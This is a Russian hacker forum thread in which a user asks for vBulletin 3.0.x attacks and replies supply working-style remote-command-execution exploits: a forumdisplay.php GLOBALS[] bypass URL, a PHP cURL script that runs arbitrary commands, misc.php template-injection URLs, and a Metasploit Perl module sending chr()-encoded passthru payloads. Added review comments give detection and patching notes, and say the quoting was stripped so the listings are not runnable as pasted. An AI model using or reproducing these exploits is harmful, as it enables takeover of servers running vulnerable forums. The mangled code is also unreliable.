vBulletin Version 3.0.3
 
что-нибудь ещё есть, кроме XSS? Поделитесь опытом, времени ковырять код — нет.
спасибо.
GoBiz
 
с уязвимостью в misc.php <a href=http://www.securitylab.ru/52879.html rel="nofollow" target="_blank">http://www.securitylab.ru/52879.html</a>; не понятно - грузится пустая страница и всё. Тыкните пальцем, в чем проблема?
GoBiz
 
скачай metasploit себе

а вообще вот:

Код
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system(id)."

Conditions:
----------------
1st condition&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: $vboptions[showforumusers] == True , the admin must set
&nbsp;&nbsp;&nbsp;&nbsp;showforumusers ON in vbulletin options.

2nd condition&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: $bbuserinfo[userid] == 0 , you must be an visitor/guest.

3rd condition&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: $DB_site->fetch_array($forumusers) == True , when you
&nbsp;&nbsp;&nbsp;&nbsp;visit the forums, it  must has at least one user show the forum.

4th condition&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: magic_quotes_gpc must be OFF

SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
&nbsp;&nbsp;&nbsp;&nbsp;init.php by secret array GLOBALS[]=1 ;)))


Код
<?php
 /*********************************************************** ***
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions[showforumusers] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo[userid] == 0 , you must be an visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must has at least
# one user show the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
# 
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
# 
 ************************************************************ **/

// NOTE(review): the string quoting appears to have been stripped by the forum
// rendering (bare words such as curl_init, _START_, _END_ and the '/' in the
// URL concatenation below), so this listing is not runnable as pasted; it is
// kept verbatim for reference only.
//
// Defender notes: the header above names the affected range (3.0 to 3.0.4,
// fixed in 3.0.5 and later) and the preconditions (guest access,
// showforumusers on, magic_quotes_gpc off). The request built below carries
// attacker-controlled text in the `comma` parameter next to `GLOBALS[]=1`, so
// access-log entries for forumdisplay.php containing `GLOBALS[]=` or a
// `comma=` value with PHP code are worth alerting on; upgrading is the fix.

// Abort unless the cURL extension is loaded (all network I/O below is curl_*).
if (!(function_exists(curl_init))) {
echo "cURL extension required\n";
exit;
}

// Positional arguments: <url> <forumid> <command> [proxy]. Only the forum id
// is coerced (intval); the command is taken as-is.
if ($argv[3]){
$url = $argv[1];
$forumid = intval($argv[2]);
$command = $argv[3];
}
else {
echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
echo "<forumid> forum id\n";
echo "<command> command to execute on server (ex: ls -la)\n";
echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
echo "ex :\n";
echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";

exit;
}

// Optional fourth argument selects an HTTP proxy for the request.
if ($argv[4])
$proxy = $argv[4];



// Query string for forumdisplay.php: GLOBALS[]=1, the forum id, and the
// `comma` value that carries the command wrapped in _START_/_END_ markers so
// the output can be cut out of the HTML response below.
$action = forumdisplay.php?GLOBALS[]=1&f=.$forumid.&comma=".echo _START_..$command..echo _END_.";

// Send one GET through cURL; RETURNTRANSFER makes curl_exec() return the body
// as a string instead of printing it.
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url./.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
// Keep only the text between the markers: +7 skips the 7-character _START_
// marker itself, the second substr cuts at _END_.
$res = substr($res, strpos($res, _START_)+7);
$res = substr($res,0, strpos($res, _END_));
echo $res;


?>


Код
# Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}


Код
##
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
#&nbsp;&nbsp;&nbsp;&nbsp;Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  Info: trying to get the command execution exploits out of the way on milw0rm.com. Ms are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
 #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://metasploit.com/project s/Framework for more information.
##

package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

# No advanced options for this module.
my $advanced = { };

# NOTE(review): indentation in this listing has been turned into HTML
# `&nbsp;` entities and string quotes were stripped by the forum rendering,
# so the hash below is not valid Perl as pasted; it is kept verbatim.
#
# Module metadata consumed by the Msf::Exploit base class via new() below.
# The Name ties the exposure to the "Add Template Name in HTML Comments = Yes"
# option on vBulletin <= 3.0.6; per the title, sites that leave that option
# off or run a later release are not affected.
my $info = {
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Version  => $Revision: 1.0 $,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Authors  => [ str0ke ],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Arch&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> [ ],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; OS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> [ ],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Priv&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> 0,
# User-settable options: each entry is [required, type, description, default].
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; UserOpts =>
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  RHOST => [1, ADDR, The target address],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  RPORT => [1, PORT, The target port, 80],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  VHOST => [0, DATA, The virtual host name of the server],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  RPATH => [1, DATA, Path to the misc.php script, /forum/misc.php],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  SSL&nbsp;&nbsp;&nbsp;=> [0, BOOL, Use SSL],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; },

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Description => Pex::Text::Freeform(qq{
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

# Reference: milw0rm entry 832 (as given in the listing).
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Refs =>
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  [MIL, 832],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],

# Payload constraints handed to the framework's payload selection.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Payload =>
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  Space => 512,
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  Keys  => [cmd, cmd_bash],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; },

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Keys => [vBulletin],
  };

sub new {
    my ($class, @args) = @_;

    # Construct through the Msf::Exploit base class, handing over this
    # module's static Info and Advanced tables; any remaining constructor
    # arguments pass straight through unchanged.
    return $class->SUPER::new(
        { Info => $info, Advanced => $advanced },
        @args,
    );
}

# Build one HTTP GET to misc.php whose `template` parameter carries the
# payload, send it, and return. The response is read but never inspected.
#
# NOTE(review): as with the rest of this listing, indentation is rendered as
# `&nbsp;` entities and string quotes (GetVar arguments, join/unpack
# arguments) were stripped by the forum; this is not runnable as pasted.
sub Exploit {
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $self = shift;
# Target and path come from the UserOpts declared in $info; VHOST falls back
# to the target host when unset.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $target_host&nbsp;&nbsp;&nbsp;&nbsp;= $self->GetVar(RHOST);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $target_port&nbsp;&nbsp;&nbsp;&nbsp;= $self->GetVar(RPORT);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my  $vhost&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;= $self->GetVar(VHOST) || $target_host;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my  $path&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;& nbsp;&nbsp;= $self->GetVar(RPATH);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my  $cmd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n bsp;&nbsp;&nbsp;= $self->GetVar(EncodedPayload)->RawPayload;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Encode the command as a set of chr() function calls
# Detection note: a `template=` value containing `{${` followed by a run of
# chr() calls is a strong indicator of this traffic in web-server access logs.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $byte = join(., map { $_ = chr(.$_.) } unpack(C*, $cmd));

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Create the get request data
# Mitigation note: per the module title, the "Add Template Name in HTML
# Comments" option is the precondition; turning it off and moving past 3.0.6
# removes the exposure.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $data = "?do=page&template={\${passthru($byte)}}";

# NOTE(review): a GET with no body still sends Content-Type and a
# Content-Length equal to the query-string length; servers ignore it, but it
# is an unusual header combination that can serve as a fingerprint.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $req =
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "GET $path$data HTTP/1.1\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "Host: $vhost:$target_port\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "Content-Type: application/html\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "Content-Length: ". length($data)."\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "Connection: Close\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "\r\n";

# Framework TCP socket; SSL and local port come from module/framework vars.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $s = Msf::Socket::Tcp->new(
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  PeerAddr  => $target_host,
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  PeerPort  => $target_port,
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  LocalPort => $self->GetVar(CPORT),
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  SSL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> $self->GetVar(SSL),
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; );

# Connection failure is reported and the run ends without sending anything.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if ($s->IsError){
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  $self->PrintLine([*] Error creating socket:  . $s->GetError);
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  return;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $self->PrintLine("[*] Sending the malicious vBulletin Get request...");

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s->Send($req);

# NOTE(review): the response is received (second argument presumably a
# timeout -- confirm against Msf::Socket::Tcp) but $results is never
# inspected or printed, so success or failure is not reported to the user.
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $results = $s->Recv(-1, 20);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s->Close();

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return;
}

1;  # a module file must evaluate to true when loaded
We're Warriors. Warriors of the World! © ManOwaR

От Тайги до британских морей - руськие хакиры всех сильней!